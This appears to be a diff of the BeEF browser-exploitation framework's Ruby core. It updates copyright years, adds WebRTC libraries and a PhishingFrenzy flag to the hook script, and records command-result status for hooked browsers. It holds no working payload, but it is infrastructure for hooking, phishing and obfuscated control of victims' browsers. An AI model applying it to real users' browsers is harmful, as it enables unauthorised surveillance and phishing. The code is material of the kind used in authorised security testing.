+          are_exec.update(:is_sent => true, :exec_time => Time.new.to_i)
+        end
+
        # @note We dynamically get the list of all browser hook handler using the API and register them
        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
      end
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,14 +21,19 @@ module BeEF
            beef_js_path = "#{$root_dir}/core/main/client/"

            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/jquery.blockUI.js)

            # @note BeEF libraries: need Eruby evaluation and obfuscation
-            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/connection.js net/cors.js are.js)
            # @note Load websocket library only if WS server is enabled in config.yaml
            if config.get("beef.http.websocket.enable") == true
              beef_js_sub_files << "websocket.js"
            end
+            # @note Load webrtc library only if WebRTC extension is enabled
+            if config.get("beef.extension.webrtc.enable") == true
+              beef_js_sub_files << "lib/webrtcadapter.js"
+              beef_js_sub_files << "webrtc.js"
+            end

            # @note antisnatchor: leave timeout.js as the last one!
            beef_js_sub_files << "timeout.js"
@@ -38,7 +43,7 @@ module BeEF

            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
-            ext_js_sub_files.each{ |ext_js_sub_file|
+            ext_js_sub_files.each { |ext_js_sub_file|
              if config.get("beef.extension.evasion.enable")
                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
@@ -103,6 +108,11 @@ module BeEF
              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
            end

+            # @note Set if PhishingFrenzy integration is enabled
+            if config.get("beef.integration.phishing_frenzy.enable")
+              hook_session_config['phishing_frenzy_enable'] = config.get("beef.integration.phishing_frenzy.enable")
+            end
+
            # @note populate place holders in the beef_js string and set the response body
            eruby = Erubis::FastEruby.new(beef_js)
            @hook = eruby.evaluate(hook_session_config)
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -38,7 +38,7 @@ module BeEF
            command_module.build_datastore(command.data)
            command_module.pre_send

-            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
+            build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?

            ws = BeEF::Core::Websocket::Websocket.instance

@@ -53,7 +53,7 @@ module BeEF
            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
              #content = command_module.output.gsub('//
              #//
-              #//   Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
              #//   See the file 'doc/COPYING' for copying permission
              #//
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -83,6 +83,7 @@ module Models
      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
      return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
      return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
+      return BeEF::Core::Constants::Os::OS_SUNOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_SUNOS_UA_STR
      return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
      return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -23,12 +23,13 @@ module Models

    has n, :results

+
    # Save results and flag that the command has been run on the hooked browser
    # @param [String] hook_session_id The session_id.
    # @param [String] command_id The command_id.
    # @param [String] command_friendly_name The command friendly name.
    # @param [String] result The result of the command module.
-    def self.save_result(hook_session_id, command_id, command_friendly_name, result)
+    def self.save_result(hook_session_id, command_id, command_friendly_name, result, status)
      # @note enforcing arguments types
      command_id = command_id.to_i

@@ -37,6 +38,7 @@ module Models
      raise Exception::TypeError, '"command_id" needs to be an integer' if not command_id.integer?
      raise Exception::TypeError, '"command_friendly_name" needs to be a string' if not command_friendly_name.string?
      raise Exception::TypeError, '"result" needs to be a hash' if not result.hash?
+      raise Exception::TypeError, '"status" needs to be an integer' if not status.integer?

      # @note get the hooked browser structure and id from the database
      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) || nil
@@ -51,20 +53,29 @@ module Models
      raise Exception::TypeError, "command is nil" if command.nil?

      # @note create the entry for the results 
-      command.results.new(:hooked_browser_id => hooked_browser_id, :data => result.to_json, :date => Time.now.to_i)
+      command.results.new(:hooked_browser_id => hooked_browser_id,
+                          :data => result.to_json,:status => status,:date => Time.now.to_i)
      command.save

-      # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
+      s = self.show_status(status)
+      log = "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions (status: #{s}) from command module [id:#{command_id}, name:'#{command_friendly_name}']"
+      BeEF::Core::Logger.instance.register('Command', log, hooked_browser_id)
+      print_info log
+    end

-      # @note prints the event into the console
-      if BeEF::Settings.console?
-        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
+    def self.show_status(status)
+      case status
+        when -1
+          result = 'ERROR'
+        when 1
+          result = 'SUCCESS'
+        else
+          result = 'UNKNOWN'
      end
+      result
    end

  end
-
 end
 end
 end
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/Show More
+++ b/Show More